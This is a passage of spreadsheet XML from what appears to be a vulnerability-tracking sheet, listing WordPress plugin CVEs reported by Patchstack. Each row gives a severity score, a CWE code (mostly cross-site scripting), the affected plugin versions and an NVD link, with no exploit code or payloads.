      <c r="D324" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in FormGent &lt;= 1.12.2 versions.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94499</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96351</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Classified Listing &lt;= 6.1.3 versions.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96351</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96352</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in YITH WooCommerce Ajax Search &lt;= 2.28.0 versions.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96352</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96814</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WooCommerce Product Table Lite &lt;= 5.6.7 versions.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96814</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96816</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Trusted Shops Easy Integration for WooCommerce &lt;= 2.0.6 versions.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96816</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96819</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in oik &lt;= 4.15.4 versions.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96819</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96820</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Awesome Support &lt;= 6.3.9 versions.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96820</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96830</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96830</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96836</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Parsi Date &lt;= 6.3 versions.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96836</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97065</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Happyforms &lt;= 1.26.15 versions.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97065</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97077</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ad Inserter &lt;= 2.8.18 versions.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97077</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97235</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97235</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97237</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97237</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97250</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in  Geo Mashup &lt;= 1.13.21 versions.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97250</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97253</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreatura LayerSlider allows Reflected XSS.
This issue affects LayerSlider: from n/a through 8.4.0.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97253</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97271</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPFunnels &lt;= 3.13.1 versions.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97271</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97272</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Premmerce Permalink Manager for WooCommerce &lt;= 2.3.13 versions.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97272</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97289</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Quiz And Survey Master &lt;= 11.2.6 versions.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97289</t>
        </is>
